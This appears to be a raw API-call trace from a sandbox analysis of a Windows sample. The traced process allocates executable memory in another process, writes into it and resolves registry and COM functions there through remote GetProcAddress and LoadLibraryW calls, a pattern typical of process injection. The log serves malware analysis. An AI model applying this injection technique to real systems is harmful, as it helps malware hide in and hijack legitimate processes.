	[0153.831] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004004, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.831] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.832] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.832] lstrlenA (lpString="RegQueryValueExW") returned 16
	[0153.832] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.832] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0306*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0306*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0153.832] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.832] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.832] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.833] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.833] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.833] ResetEvent (hEvent=0x268) returned 1
	[0153.833] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.833] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.833] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.834] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.834] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.834] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004008, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.834] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.834] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.834] lstrlenA (lpString="RegCloseKey") returned 11
	[0153.834] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.834] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d02f8*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d02f8*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0153.835] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.835] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.835] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.835] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.835] ResetEvent (hEvent=0x268) returned 1
	[0153.835] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.836] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.836] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.836] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.836] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.836] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x1000400c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.836] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.836] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.836] lstrlenA (lpString="RegQueryInfoKeyW") returned 16
	[0153.836] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.836] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d033a*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d033a*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0153.837] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.837] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.837] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.837] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.837] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.838] ResetEvent (hEvent=0x268) returned 1
	[0153.838] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.838] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.838] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.838] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.838] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.838] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004010, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.838] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.839] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0153.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d03be, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0153.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d03be, cbMultiByte=-1, lpWideCharStr=0x23079d8, cchWideChar=10 | out: lpWideCharStr="ole32.dll") returned 10
	[0153.839] lstrlenW (lpString="ole32.dll") returned 9
	[0153.839] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.839] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x23079d8*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23079d8*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0153.839] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0153.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.839] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.839] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0153.839] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0153.840] ResetEvent (hEvent=0x268) returned 1
	[0153.840] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.854] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0153.854] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.854] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.854] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.855] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.855] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.855] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.855] lstrlenA (lpString="CoInitializeSecurity") returned 20
	[0153.855] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.855] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0396*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0396*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0153.855] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.855] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.855] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.856] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.856] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.856] ResetEvent (hEvent=0x268) returned 1
	[0153.856] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.856] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.856] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.857] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.857] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.857] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040c8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.857] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.857] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.857] lstrlenA (lpString="CoCreateInstance") returned 16
	[0153.857] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.857] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0382*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0382*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0153.858] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.858] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.858] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.858] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.858] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.859] ResetEvent (hEvent=0x268) returned 1
	[0153.859] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.859] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.859] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.859] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.859] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.859] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040cc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.859] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.860] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.860] lstrlenA (lpString="CoSetProxyBlanket") returned 17
	[0153.860] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.860] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d036e*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d036e*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0153.860] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.860] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.860] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.860] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.861] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.861] ResetEvent (hEvent=0x268) returned 1
	[0153.861] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.861] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.861] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.861] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.861] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.861] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040d0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.862] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.862] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.862] lstrlenA (lpString="CoUninitialize") returned 14
	[0153.862] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.862] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d035c*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d035c*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0153.862] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.862] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.862] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.863] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.863] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.863] ResetEvent (hEvent=0x268) returned 1
	[0153.863] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.863] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.863] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.864] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.864] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.864] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040d4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.864] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.864] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.864] lstrlenA (lpString="CoInitializeEx") returned 14
	[0153.864] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.864] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d03ae*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d03ae*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0153.865] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.865] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.865] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.865] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.865] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.866] ResetEvent (hEvent=0x268) returned 1
	[0153.866] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.866] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.866] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.866] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.866] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.866] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040d8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.867] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.867] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0153.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d03c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0153.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d03c8, cbMultiByte=-1, lpWideCharStr=0x23079d8, cchWideChar=13 | out: lpWideCharStr="OLEAUT32.dll") returned 13
	[0153.867] lstrlenW (lpString="OLEAUT32.dll") returned 12
	[0153.867] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.867] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x23079d8*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23079d8*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0153.867] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0153.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.867] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.867] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0153.868] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0153.868] ResetEvent (hEvent=0x268) returned 1
	[0153.868] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.869] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0153.869] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.870] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.870] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.870] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.870] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
